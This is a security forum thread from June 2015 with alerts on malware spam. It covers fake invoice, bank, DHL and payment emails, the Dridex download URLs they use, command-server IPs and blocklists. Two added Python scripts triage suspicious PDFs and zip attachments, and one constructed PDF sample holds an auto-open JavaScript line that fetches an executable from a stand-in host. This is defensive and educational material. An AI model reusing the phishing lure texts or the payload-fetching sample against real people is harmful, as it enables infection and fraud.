
Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  1. #721
    AplusWebMaster (Adviser Team); joined Oct 2005; location USA; 6,881 posts

    Fake 'Bank payment' SPAM

    FYI...

    Fake 'Bank payment' SPAM – PDF malware
    - http://myonlinesecurity.co.uk/bank-p...k-pdf-malware/
    8 June 2015 - "'Bank payment' pretending to come from sarah@ hairandhealth .co.uk with a pdf attachment is another one from the current bot runs... This email contains a genuine PDF which has embedded scripts that will infect you. So far none of the automatic analysis tools can find any malicious content but it is trying to send multicast messages...
    Update: An automatic analysis by Payload security* gives the download location as hundeschulegoerg .de/15/10.exe ( VirusTotal**)... Adobe reader in -recent- versions has Protected view automatically -enabled- and unless you press-the-button to 'enable all features', you should be safe from this attack... make sure you -uncheck- -any- additional offerings of security scans/Google chrome or -toolbars- that it wants to include in the download:
    > http://myonlinesecurity.co.uk/wp-con...4-1024x423.png
    The email (which has random amounts) looks like:
    Dear client
    Please find attached a bank payment for £3033.10 dated 10th June 2015
    to pay invoice 1757. With thanks.
    Kind regards
    Sarah
    Accounts


    Today's Date: Bank payment 100615.pdf - Current Virus total detections: 2/57***
    ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.hybrid-analysis.com/samp...nvironmentId=2

    ** https://www.virustotal.com/en-gb/fil...is/1433753588/
    ... Behavioural information
    TCP connections
    146.185.128.226: https://www.virustotal.com/en-gb/ip-...6/information/
    88.221.15.80: https://www.virustotal.com/en-gb/ip-...0/information/

    *** https://www.virustotal.com/en-gb/fil...is/1433751824/

    hundeschulegoerg .de: 212.40.179.111: https://www.virustotal.com/en-gb/ip-...1/information/

    - http://blog.dynamoo.com/2015/06/malw...k-payment.html
    8 June 2015
    "... Recommended blocklist:
    146.185.128.226
    31.186.99.250
    176.99.6.10
    203.151.94.120
    185.12.95.40
    "

    Last edited by AplusWebMaster; 2015-06-08 at 16:33.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .
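
The post above says the PDF carries embedded scripts that the automated scanners missed. A first-pass check a practitioner can run on such an attachment, as an added example for this thread (not code from the quoted blog post or from any tool it names): count the PDF name objects that give a document active behaviour, the way pdfid-style triage does. The sample PDFs below are constructed for the demo, not the 'Bank payment 100615.pdf' file; the trigger rule (script plus an auto-open action, or a /Launch action) is this example's own heuristic.

```python
"""Static triage of a PDF attachment for active-content markers.

Added example for this thread, not code from the quoted blog posts. It
mimics the keyword count that tools such as pdfid report: it looks for the
PDF name objects that let a document run code or open something on load.
The sample PDFs below are constructed here for the demo; they are not the
'Bank payment 100615.pdf' sample the post describes.
"""
import re

# Name objects that give a PDF active behaviour. A clean invoice needs none of them.
SUSPICIOUS_NAMES = (
    b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
    b"/EmbeddedFile", b"/RichMedia", b"/XFA", b"/URI",
)

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")

def normalise_names(data: bytes) -> bytes:
    """Undo #xx escapes inside name objects so /Java#53cript is seen as /JavaScript."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)

def count_markers(data: bytes) -> dict:
    """Count each suspicious name object; only names that occur are returned."""
    text = normalise_names(data)
    counts = {}
    for name in SUSPICIOUS_NAMES:
        # A name ends at whitespace or a delimiter, so /JS must not also match /JSx.
        pattern = re.escape(name) + rb"(?![A-Za-z0-9_])"
        n = len(re.findall(pattern, text))
        if n:
            counts[name.decode()] = n
    return counts

def is_suspicious(data: bytes) -> bool:
    """Heuristic (this example's own): script plus an automatic trigger, or any /Launch action."""
    c = count_markers(data)
    has_script = c.get("/JavaScript", 0) + c.get("/JS", 0) > 0
    has_trigger = c.get("/OpenAction", 0) + c.get("/AA", 0) > 0
    return (has_script and has_trigger) or c.get("/Launch", 0) > 0

# Constructed sample: a one-page PDF whose catalog runs JavaScript on open.
# The /Java#53cript spelling exercises the hex-escape normalisation.
MALICIOUS_SAMPLE = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /Java#53cript /JS (app.launchURL("http://example.invalid/payload.exe", true);) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: the same skeleton with no actions at all.
BENIGN_SAMPLE = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        verdict = "suspicious" if is_suspicious(sample) else "ok"
        print(label, count_markers(sample), verdict)
```

This only sees names that sit in plain text. Objects packed into compressed object streams are invisible to it until those streams are inflated, so an empty result is not a clean bill of health; keep Adobe Reader's Protected View on, as the post advises, and treat any count above zero in an invoice as reason enough not to enable features.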

  2. #722

    Fake 'Invoice', 'Password Confirmation' SPAM, Emails Bearing Gifts

    FYI...

    Fake 'Invoice' SPAM - PDF malware
    - http://myonlinesecurity.co.uk/re-inv...e-pdf-malware/
    9 June 2015 - "'Re: Invoice' coming from random senders and random email addresses with a semi-random zip attachment; the zip is always called 'invoice(random number).zip'. It is another one from the current bot runs... other emails today pretending to come from RBC Express <ISVAdmin@ rbc .com> with a subject of 'invoices', along with a 'Lloyds Bank – Pendeford Securities – Please Read Action Required/PI Documents/ Region code East 2/ 4084583/'. These 2 have a different malware payload (VirusTotal*)... The email looks like:

    Check Invoice number

    9 June 2015: Invoice (42).zip: Extracts to: Invoice_store.exe - Current Virus total detections: 2/57**
    This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en-gb/fil...is/1433843143/
    ... Behavioural information
    TCP connections
    64.182.208.183: https://www.virustotal.com/en-gb/ip-...3/information/
    188.120.194.101: https://www.virustotal.com/en-gb/ip-...1/information/
    216.254.231.11: https://www.virustotal.com/en-gb/ip-...1/information/
    88.221.15.80: https://www.virustotal.com/en-gb/ip-...0/information/

    ** https://www.virustotal.com/en-gb/fil...is/1433843556/
    ___

    Fake 'Password Confirmation' SPAM – doc/xls malware
    - http://myonlinesecurity.co.uk/passwo...sheet-malware/
    9 June 2015 - "'Password Confirmation [742263403307] T82' pretending to come from steve.tasker81@ thomashiggins .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email (which has random numbers in the subject) looks like:

    Full document is attached

    09 June 2015: 1913.doc - Current Virus total detections: 2/57*
    ... which connects to and downloads a Dridex banking malware from speakhighly .com/42/11.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en-gb/fil...is/1433841783/

    ** https://www.virustotal.com/en-gb/fil...is/1433842088/
    ... Behavioural information
    TCP connections
    173.230.130.172: https://www.virustotal.com/en-gb/ip-...2/information/
    5.178.43.48: https://www.virustotal.com/en-gb/ip-...8/information/

    speakhighly .com: 77.73.6.74: https://www.virustotal.com/en-gb/ip-...4/information/

    - http://blog.dynamoo.com/2015/06/malw...firmation.html
    9 June 2015
    "... Recommended blocklist:
    173.230.130.172
    94.23.53.23
    31.186.99.250
    "
    ___

    Fake 'Unpaid invoice' SPAM – doc/xls malware
    - http://myonlinesecurity.co.uk/unpaid...sheet-malware/
    9 June 2015 - "'Unpaid invoice' pretending to come from Debbie Spencer <Debbie@ burgoynes-lyonshall .co .uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
    Hi
    Could you let me know when the attached will be paid?
    Many thanks
    Debbie
    Deborah Spencer
    Company Accountant
    Burgoynes (Lyonshall) Ltd
    Lyonshall
    Kington
    Herefordshire HR5 3JR
    01544 340283 ...


    The malware in this email is exactly the -same- as described in today’s earlier malspam run with word docs 'Password Confirmation [742263403307] T82 – word doc or excel xls spreadsheet malware'*... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * http://myonlinesecurity.co.uk/passwo...sheet-malware/
    ___

    The HTTPS-Only Standard
    - https://https.cio.gov/
    ___

    Beware of Emails Bearing Gifts
    - http://www.darkreading.com/partner-p...a/d-id/1320769
    6/9/2015 - "Crime gangs are building very legitimate-looking emails as cover for phishing and ransomware, and they are having enough success that the attacks are escalating. In the first quarter of 2015, McAfee Labs registered a 165% increase in new ransomware driven largely by the new, hard-to-detect CTB-Locker ransomware family, new ransomware families such as Teslacrypt and TOX, and the emergence of new versions of CryptoWall, TorrentLocker, and BandarChor. Dell Secureworks* believes the ransomware business truly pays, with CryptoWall reaching at least 1 million victims and collecting about $1.8 million in ransom. The growth of ransomware is likely to continue to surge given the rise of new “business models,” the growing availability and ease of operation of newer ransomware kits, and the general increase in tactical sophistication. For instance, CTB-Locker possesses clever techniques for evading security software, higher-quality phishing emails, and an “affiliate” program that offers accomplices a percentage of ransom payments in return for flooding cyberspace with CTB-Locker phishing messages. In the case of TOX, ransomware is going the way of other malware, delivered in turnkey ransomware packages, simplifying the development, launch, and ongoing operation of ransomware campaigns. And where fewer technical skills are required, you have an increase of less-skilled perpetrators getting into a cybercrime business... Phishing and ransomware attacks are hardly new, but the rapid changes in malware code and the legitimate-looking emails are making it harder for both users and antivirus programs to detect the surprise waiting at the other end of the link. No single security solution provides an adequate defense. When malware can sneak through a network firewall, lie low to trick a sandbox, and evade endpoint antivirus, a thorough defense requires the combined resources of a security-connected framework."
    * http://www.secureworks.com/cyber-thr...reat-analysis/
    ___

    Flash malware jumps over 300 percent - Q1-2015
    - http://www.theinquirer.net/inquirer/...uarter-of-2015
    Jun 09 2015 - "MALWARE ATTACKS on the Adobe Flash platform rose by a horrifying 317 percent in the first quarter of 2015. New figures in the McAfee Labs Threats Report May 2015 (PDF*) show that the number of recorded Flash malware instances was almost 200,000 in Q1 2015, compared with 47,000 in Q4 2014...
    * http://www.mcafee.com/us/resources/r...at-q1-2015.pdf
    Spam continues ever onward with six trillion messages sent in Q1. A total of 1,118 spam domains were discovered in the UK alone, beating Russia (1,104) and Japan (1,035). Phishing domains hit 887 in the UK, compared with France (799) and the Netherlands (680). Overall, McAfee Labs observed 362 phishing attacks a minute, or six every second..."

    Last edited by AplusWebMaster; 2015-06-09 at 20:50.

  3. #723

    Fake 'phone bill' SPAM

    FYI...

    Fake 'BTT telephone bill' SPAM – doc/xls malware
    - http://myonlinesecurity.co.uk/your-m...sheet-malware/
    10 Jun 2015 - "'Your monthly BTT telephone bill' pretending to come from Hayley Sweeney <admins@ bttcomms .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:

    Please find attached your telephone bill for last month. This message was sent automatically.
    For any queries relating to this bill, please contact Customer Services on 01536 211100.


    10 June 2015 : Invoice_68362.doc - Current Virus total detections: 5/57*
    ... Which downloads a Dridex banking malware from www .jimaimracing .co.uk/64/11.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
    * https://www.virustotal.com/en/file/b...is/1433931273/

    ** https://www.virustotal.com/en/file/3...is/1433932505/

    jimaimracing .co.uk: 91.194.151.37: https://www.virustotal.com/en/ip-add...7/information/

    - http://blog.dynamoo.com/2015/06/malw...y-sweeney.html
    10 June 2015
    "... Recommended blocklist:
    173.230.130.172
    94.23.53.23
    176.99.6.10
    "

    Last edited by AplusWebMaster; 2015-06-10 at 15:28.

  4. #724

    Fake 'order reference' SPAM, 'New_Order' Phish ...

    FYI...

    Fake 'order reference' SPAM - PDF malware
    - http://myonlinesecurity.co.uk/your-o...e-pdf-malware/
    11 Jun 2015 - "'Your order reference is 05806' pretending to come from inform <john.wade@ precisionclubs .com> with a zip attachment is another one from the current bot runs... The email looks like:
    Dear client,
    Thank you for the order,
    your credit card will be charged for 312 dollars.
    For more information, please visit our web site ...
    Best regards, ticket service.
    Tel./Fax.: (828) 012 88 840


    11 June 2015: payment_n09837462_pdf.zip:
    Extracts to: payment_n09837462_pdf_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _.exe
    Current Virus total detections: 5/57*. Note the series of _ after the pdf. That is designed to try to fool you into thinking that the .exe file is a pdf so you open it. Most windows computers won’t show the .exe in windows explorer if enough spaces or _ are inserted. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en-gb/fil...is/1434002812/
    ___

    Fake 'New_Order' email / Phish...
    - http://blog.dynamoo.com/2015/06/phis...tructions.html
    11 Jun 2015 - "I've seen a few of these today, presumably they aren't quite spammy enough to get blocked by our mail filters.. The attachment is New_Order_#056253_Hf_Constructions.pdf which looks like a purchase order, but there is a blurred out section:
    Screenshot: https://4.bp.blogspot.com/-4adKeKIur.../s640/hf-1.jpg

    An examination of the underlying PDF file shows two URLs... In turn these redirect... The second URL listed 404s, but the first one is active. According to the URLquery report*, it looks harmless, just leading to a phishing page. But when I tried it in a test environment, the behaviour was somewhat different and it also attempted to load a page... This page 404s, but was previously hosted on a bad server at 92.222.42.183 [VT report**]. That server has been offline for a few days, but the URL is suggestive of an exploit kit of some sort. The "megatrading .hol.es" (hosted on 31.220.16.16 by Hostinger - VT report***) landing page looks like a straightforward phish:
    Screenshot: https://4.bp.blogspot.com/-lsN0K-Cu2.../s640/hf-2.png

    Entering the username and password always seems to return an error, even if you are absolutely certain the combination is correct:
    > https://2.bp.blogspot.com/-R9BG4uiZ_.../s320/hf-3.png
    I suspect that all this portion is doing is collecting email addresses and passwords for use later. Webmail accounts have some value to the bad guys, and of course many people re-use passwords all over the place, so it could be used as a way to get access to other services. Take care.
    Recommended blocklist:
    31.220.16.16
    92.222.42.183
    "

    * http://urlquery.net/report.php?id=1434011774093

    ** https://www.virustotal.com/en/ip-add...3/information/

    *** https://www.virustotal.com/en/ip-add...6/information/
    ___

    Mystery continues to surround the nude celebrity iCloud hack
    - http://www.hotforsecurity.com/blog/m...ack-11990.html
    June 11, 2015 - "Sure, companies and governments get hacked all the time. But for the mainstream media to *really* take an interest, you need to add a twist of celebrity (preferably nude and female). That’s what happened last year when the so-called 'Fappening' saw the intimate and private photographs of scores of female celebrities and actresses, many of them topless or nude, leak onto 4Chan and the seedier corners of Reddit. Famous names who had their privacy violated by the leak included Jennifer Lawrence, Kate Upton, Victoria Justice, Kirsten Dunst, Hope Solo, Krysten Ritter, Yvonne Strahovski, Teresa Palmer, Ariana Grande, and Mary Elizabeth Winstead, amongst many others... Gawker has revealed a search warrant and affidavit, revealing that the FBI has seized computers belonging to a Chicago man in connection with the hack. And it appears that the documents back Apple’s claim that their iCloud service did -not- suffer a breach as such, but instead was the victim of a targeted attack after celebrities’ passwords and security questions were determined. In the affidavit, FBI cybercrime special agent Josh Sadowsky says that an IP address assigned to one Emilio Herrera was “used to access approximately 572 unique iCloud accounts” between May 13 2013 and August 31 2014. According to the statement, a number of the accounts accessed belonged to celebrities who had photos leaked online. In all, iCloud accounts were accessed -3,263- times from the IP address. In addition, the IP address was used from a computer running Windows 7 to reset -1,987- unique iCloud account passwords. Unsurprisingly, law enforcement officers visited Herrera’s house in Chicago and walked away with computers, phones, SD cards, and other devices that no doubt they planned to submit to forensic scrutiny. In particular they would be interested in uncovering any evidence of activity which might suggest phishing, the usage of hacking tools or email forwarding.
    But here’s where things get interesting. According to Gawker, Herrera has -not- been charged with any crime and is not even considered a suspect at this point. It would certainly be surprising if someone involved in such an industrial-scale account hijacking operation would not have taken elementary steps to hide their true IP address, so is it possible that Herrera’s computers were being used by the hackers of nude celebs’ iCloud accounts -without- Herrera’s knowledge or permission? If that is the case, then it’s yet another reason why all computer users need to learn the importance of proper computer security. Keeping your computer protected with a layered defence and patched against the latest vulnerabilities reduces the chance of a remote hacker gaining control of your PC. Because the very last thing you want is to be implicated in a crime that you didn’t commit, because hackers have been able to commandeer your computer for their own evil ends."
    - Graham Cluley

    Last edited by AplusWebMaster; 2015-06-11 at 15:54.
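
Posts #722 and #724 above describe the same attachment trick in two forms: an .exe inside the zip that merely carries a PDF icon, and a name that pads a fake 'pdf' extension with underscores or spaces so that Explorer, with known extensions hidden, shows only the document-looking part. One way to check a zip attachment for both, as an added example for this thread rather than code from the quoted blog posts: inspect each member's name and its first two bytes. The zip built below is constructed; the member names follow the ones quoted in the posts, but the contents are 64-byte stubs, not the real samples, and the name heuristics are this example's own.

```python
"""Flag zip attachments whose members are executables dressed up as documents.

Added example for this thread (not code from the quoted blog posts). It covers
the two tricks described in posts #722 and #724: an .exe that only carries a
PDF icon, and an .exe whose name pads a fake 'pdf' extension with underscores
or spaces so Explorer, with extensions hidden, shows the document-looking part.
The zip built below is constructed for the demo; the member names are modelled
on the ones quoted in the thread but the file contents are not the real samples.
"""
import io
import re
import zipfile

# Extensions Windows will execute directly from Explorer or a mail client (assumed list).
EXEC_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse", ".vbs", ".wsf", ".hta"}
# Words that make a name read like a document; used only when the real extension is executable.
DOC_WORDS = ("pdf", "doc", "xls", "invoice", "payment", "docs")

def has_mz_header(data: bytes) -> bool:
    """Windows PE files start with 'MZ' whatever their name says."""
    return data[:2] == b"MZ"

def classify_name(name: str) -> list:
    """Return the reasons a member name is suspicious (empty list = nothing odd)."""
    reasons = []
    base = name.rsplit("/", 1)[-1]
    lower = base.lower()
    ext = ("." + lower.rsplit(".", 1)[-1]) if "." in lower else ""
    if ext in EXEC_EXTENSIONS:
        reasons.append(f"executable extension {ext}")
        stem = lower[: -len(ext)]
        # e.g. 'payment_n09837462_pdf_ _ _ _ _.exe': a document word, then only padding
        if re.search(r"(?:_|\.|\s)(" + "|".join(DOC_WORDS) + r")[\s_.]*$", stem):
            reasons.append("document-looking stem before the real extension")
        # A long run of spaces/underscores pushes the real extension out of view
        if re.search(r"[\s_]{5,}$", stem):
            reasons.append("padding before the real extension")
    return reasons

def scan_zip(blob: bytes) -> dict:
    """Map each member to its list of findings, including the MZ-header check."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            reasons = classify_name(info.filename)
            with zf.open(info) as member:
                head = member.read(2)
            if has_mz_header(head):
                reasons.append("PE header (MZ) in content")
            findings[info.filename] = reasons
    return findings

def build_sample_zip() -> bytes:
    """Constructed attachment: two PE stubs with the thread's naming tricks and a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("payment_n09837462_pdf_ _ _ _ _ _ _ _ _ _.exe", b"MZ" + b"\x00" * 62)
        zf.writestr("Invoice_store.exe", b"MZ" + b"\x00" * 62)
        zf.writestr("readme.txt", b"plain text, nothing to see")
    return buf.getvalue()

if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_zip()).items():
        print(repr(member), "->", reasons or "clean")
```

The name checks are heuristics and will say nothing about an .exe with an unremarkable name such as the New_docs.exe in post #725; the MZ check catches that one too, because a PE file starts with those two bytes whatever it is called. On the desktop the matching user-side fix is the one the posts repeat: turn on "show known file extensions".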

  5. #725

    Fake 'Confirmation transfer' SPAM, Malvertising 'Pop-under ads' lead to CryptoWall

    FYI...

    Fake 'Confirmation transfer' SPAM - PDF malware
    - http://myonlinesecurity.co.uk/hsbc-c...e-pdf-malware/
    12 June 2015 - "'Confirmation of the transfer' pretending to come from HSBC (random name@random email address) with a zip attachment is another one from the current bot runs... The email looks like:
    Transfer:
    Number of Transfer: 359880-67692630-94464
    To: [redacted]
    Bank sender: HSBS
    Country Poster: England
    City Poster: London


    12 June 2015: transfer-England-359880-67692630-94464.zip(random numbers):
    Extracts to: New_docs.exe - Current Virus total detections: 4/57*
    This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en-gb/fil...is/1434111878/
    ... Behavioural information
    TCP connections
    64.182.208.183: https://www.virustotal.com/en-gb/ip-...3/information/
    188.120.194.101: https://www.virustotal.com/en-gb/ip-...1/information/
    24.19.25.40: https://www.virustotal.com/en-gb/ip-...0/information/
    88.221.14.249: https://www.virustotal.com/en-gb/ip-...9/information/
    ___

    Malvertising 'Pop-under ads' lead to CryptoWall
    - https://blog.malwarebytes.org/malver...ryptowall-3-0/
    June 11, 2015 - "... malvertising leverages the infrastructure provided by ad networks to distribute malicious content to end users while they browse the Internet... a prolific ad network (over 180M hits/month according to SimilarWeb) being used by online fraudsters to distribute malware and other nuisances. 'Popcash' is a pop-under ad network that offers services for both publishers and advertisers: https://blog.malwarebytes.org/wp-con...opcashlogo.png
    'Pop-under ads are similar to pop-up ads, but the ad window appears -hidden- behind the main browser window rather than superimposed in front of it... They usually remain -unnoticed- until the main browser window is closed or minimized, leaving the user’s attention free for the advertisement... users therefore react 'better' to pop-under advertising than to pop-up advertising because of this different, delayed 'impression'. — Wikipedia**
    ** https://en.wikipedia.org/wiki/Pop-up_ad#Pop-under_ads
    ... In this case, we received a URL used as a gate to an exploit kit:
    > https://blog.malwarebytes.org/wp-con...edirection.png
    The Magnitude EK starts with a simplified landing page that contains the code to launch a Flash exploit and an iframe to perform an Internet Explorer exploit... The Flash exploit (VT)[3] is CVE-2015-3090 as reported on malware.dontneedcoffee[4]:
    3] https://www.virustotal.com/en/file/0...is/1434044838/
    4] http://malware.dontneedcoffee.com/20...00169-and.html
    ... The Internet Explorer exploit (CVE-2014-6332 or CVE-2013-2551 thanks @kafeine) is prepared via a heavily encoded piece of JavaScript... Several URLs are loaded but only a couple actually loaded the same binary (VT)[5] detected by Malwarebytes Anti-Malware as Trojan.Dropper.Necurs, which eventually loads CryptoWall 3.0... other slots are available and could be filled with different malware families by the exploit kit operator...
    5] https://www.virustotal.com/en/file/5...is/1434001814/
    ... CryptoWall 3.0: Magnitude EK, just like many other exploit kits recently, is pushing crypto ransomware, possibly one of the worst strains of malware because it uses genuine encryption to lock down a user’s personal files. Soon after the ransomware takes over the PC, it will prompt a message warning of what just happened and giving details on how to proceed:
    > https://blog.malwarebytes.org/wp-con...LP_DECRYPT.png
    In this case, one needs to pay $500 to get their files back within the deadline, otherwise that amount doubles:
    > https://blog.malwarebytes.org/wp-con...2015/06/BT.png
    Conclusions: Because malvertising involves multiple players in order to work (publishers, ad networks, visitors) each has its own role to play in combatting this problem. Publishers (should) be wise in choosing their third-party advertisers by choosing reputable ones (although it is not a 100% guarantee (nothing is) that incidents will not happen). Ad networks can and should also ensure that the traffic they serve is clean. We contacted Popca$h on two separate occasions through their official “report malware” page, but -never- received a response... The campaign is still -ongoing- and not only serving exploits but -also- tech support scams[6] customized for your browser, ISP, city, etc:
    6] https://blog.malwarebytes.org/wp-con...06/warning.png "
    (More detail at the malwarebytes URL at the top of this post.)

    - http://windowssecrets.com/patch-watc...ffice-updates/
    June 11, 2015 - "... Flash Player 18.0.0.160 addresses 13 vulnerabilities, some of which have already been used in ransomware attacks..."

    Last edited by AplusWebMaster; 2015-06-12 at 16:52.

  6. #726

    Fake 'Payment Confirmation', 'Nyfast Payment', 'PI-ORDER', 'New Doc' SPAM, Bank PHISH

    FYI...

    Fake 'Payment Confirmation' SPAM - doc/xls malware
    - http://blog.dynamoo.com/2015/06/malw...firmation.html
    15 Jun 2015 - "This fake financial spam does not come from Reed, but is instead a simple forgery with a malicious attachment:
    From: reed .co.uk Credit Control [mailto:creditcontrol.rol@ reed .co.uk]
    Sent: Monday, June 15, 2015 11:10 AM
    Subject: Payment Confirmation 29172230
    Dear Sirs,
    Many thanks for your card payment. Please find payment confirmation attached below.
    Should you have any queries, please do not hesitate to contact Credit Control Team on 0845 241 9293.
    Kind Regards
    Credit Control Team
    T: 020 7067 4584
    F: 020 7067 4628
    Email: creditcontrol.rol@ reed .co.uk


    The only sample I have seen so far has an attachment 29172230_15.06.15.doc [detection rate 3/57*] which contains this malicious macro... which downloads a component from the following location:
    http ://www .freewebstuff .be/34/44.exe
    This is saved as %TEMP%\ginkan86.exe and has a VirusTotal detection rate of 6/57**. There will probably be other download locations, but they should all lead to an identical binary. Automated analysis tools... show traffic to the following IPs:
    136.243.14.142 (Hetzner, Germany)
    71.14.1.139 (Charter Communications, US)
    173.230.130.172 (Linode, US)
    94.23.53.23 (OVH, France)
    176.99.6.10 (Global Telecommunications Ltd, Russia)
    According to this Malwr report[3], it also drops a Dridex DLL with a detection rate of 18/57[4].
    Recommended blocklist:
    136.243.14.142
    71.14.1.139
    173.230.130.172
    94.23.53.23
    176.99.6.10
    "
    * https://www.virustotal.com/en/file/b...is/1434362701/

    ** https://www.virustotal.com/en/file/0...is/1434362861/

    3] https://malwr.com/analysis/NDI1OGY0N...A0YzFlMzk2MDA/

    4] https://www.virustotal.com/en/file/0...is/1434362861/

    freewebstuff .be: 46.21.172.135: https://www.virustotal.com/en-gb/ip-...5/information/

    - http://myonlinesecurity.co.uk/paymen...sheet-malware/
    15 Jun 2015
    Screenshot: http://myonlinesecurity.co.uk/wp-con...nfirmation.png
    > https://www.virustotal.com/en-gb/fil...is/1434364970/
    ___

    Fake 'Nyfast Payment' SPAM – doc/xls malware
    - http://myonlinesecurity.co.uk/nyfast...sheet-malware/
    15 Jun 2015 - "'[Nyfast] Payment accepted' pretending to come from Nyfast <sales@ nyfast .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...

    Screenshot: http://myonlinesecurity.co.uk/wp-con.../06/nyfast.png

    15 June 2015: 101153.doc - Current Virus total detections: 3/57*
    ... Which connects to and downloads Dridex banking malware from http ://webbouw .be/34/44.exe ( VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en-gb/fil...is/1434364039/

    ** https://www.virustotal.com/en-gb/fil...is/1434362861/

    webbouw .be: 46.21.172.135: https://www.virustotal.com/en/ip-add...5/information/
    ___

    Fake 'PI-ORDER' SPAM – PDF malware
    - http://myonlinesecurity.co.uk/pi-ord...e-pdf-malware/
    15 Jun 2015 - "'PI-ORDER' with a zip attachment pretending to come from suiming <suiminggroup@ cs .ename .net> is another one from the current bot runs... The email looks like:
    Dear Sir/madam,
    Find attached our purchase order. Kindly quote us best price and send us proforma invoice asap, so that we can proceed with the necessary payment.kindly confirm the PO and send PI asap.
    kind Regards
    suiming Group


    15 June 2015: PI-ORDER.zip: Extracts to: PI-ORDER.exe - Current Virus total detections: 9/57*
    This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en-gb/fil...is/1434339886/
    ___

    Fake 'New Doc' SPAM - doc/xls malware
    - http://myonlinesecurity.co.uk/will-k...sheet-malware/
    15 Jun 2015 - "'Will Kinghan henryhowardfinance .co .uk New Doc' pretending to come from Will Kinghan <WKinghan@hhf .uk .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...

    Screenshot: http://myonlinesecurity.co.uk/wp-con...ll-kinghan.png

    15 June 2015 : New doc.doc ... which is the -same- malware as described in today’s other word doc malspam runs Payment Confirmation reed .co .uk Credit Control* – word doc or excel xls spreadsheet malware and [Nyfast] Payment accepted** – word doc or excel xls spreadsheet malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
    * http://myonlinesecurity.co.uk/paymen...sheet-malware/

    ** http://myonlinesecurity.co.uk/nyfast...sheet-malware/
    ___

    'Let us help you make your online banking with HSBC more secure' - PHISH
    - http://myonlinesecurity.co.uk/let-us...cure-phishing/
    15 Jun 2015 - "An email saying 'Let us help you make your online banking with HSBC more secure' is one of today’s -phishing- attempts. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like:
    - There have been unauthorised or suspicious attempts to log in to your account, please verify
    - Your account has exceeded its limit and needs to be verified
    - Your account will be suspended !
    - You have received a secure message from < your bank>
    - We are unable to verify your account information
    - Update Personal Information
    - Urgent Account Review Notification
    - We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
    - Confirmation of Order


    ... It will NEVER be a genuine email from PayPal or Your Bank so don’t ever fill in the html (webpage) form that comes attached to the email. Some versions of this phish will have a link to a website that looks at first glance like the genuine bank website. That is also false... The link in the email directs you to a -fake- site, if you look at the fake website, you would be very hard-pressed to tell the difference from the fake one and the genuine site. The -only- way is look at the address bar and in the Genuine PayPal site, when using Internet Explorer the entire address bar is in green (in Chrome or Firefox, only the padlock symbol on the left of the browser is green):
    >> http://myonlinesecurity.co.uk/wp-con...phish_site.png
    ... luckily the phishing site has been deactivated by the webhosts, but be careful and remember that banks don’t send emails saying 'follow-the-link' to change anything..."
    ___

    Fake 'Notice DHL' SPAM - PDF malware
    - http://myonlinesecurity.co.uk/hsbc-n...e-pdf-malware/
    15 Jun 2015 - "'Notice DHL' pretending to come from HSBC (random name @ random email address) with a zip attachment is another one from the current bot runs... The waybill number is random in each email but -matches- the attachment name. The email looks like:
    Notice DHL
    Courier our company was unable to deliver the goods.
    CAUSE: was lost your number
    Delivery Status: Active
    Services: delivery in one day
    Waybill number for your cargo: WL4OY-k5qvML-0136
    Special sticker attached to the letter. Print sticker and show it in your post office.


    15 June 2015: Sticker-WL4OY-k5qvML-0136.zip: Extracts to: New_docs.exe
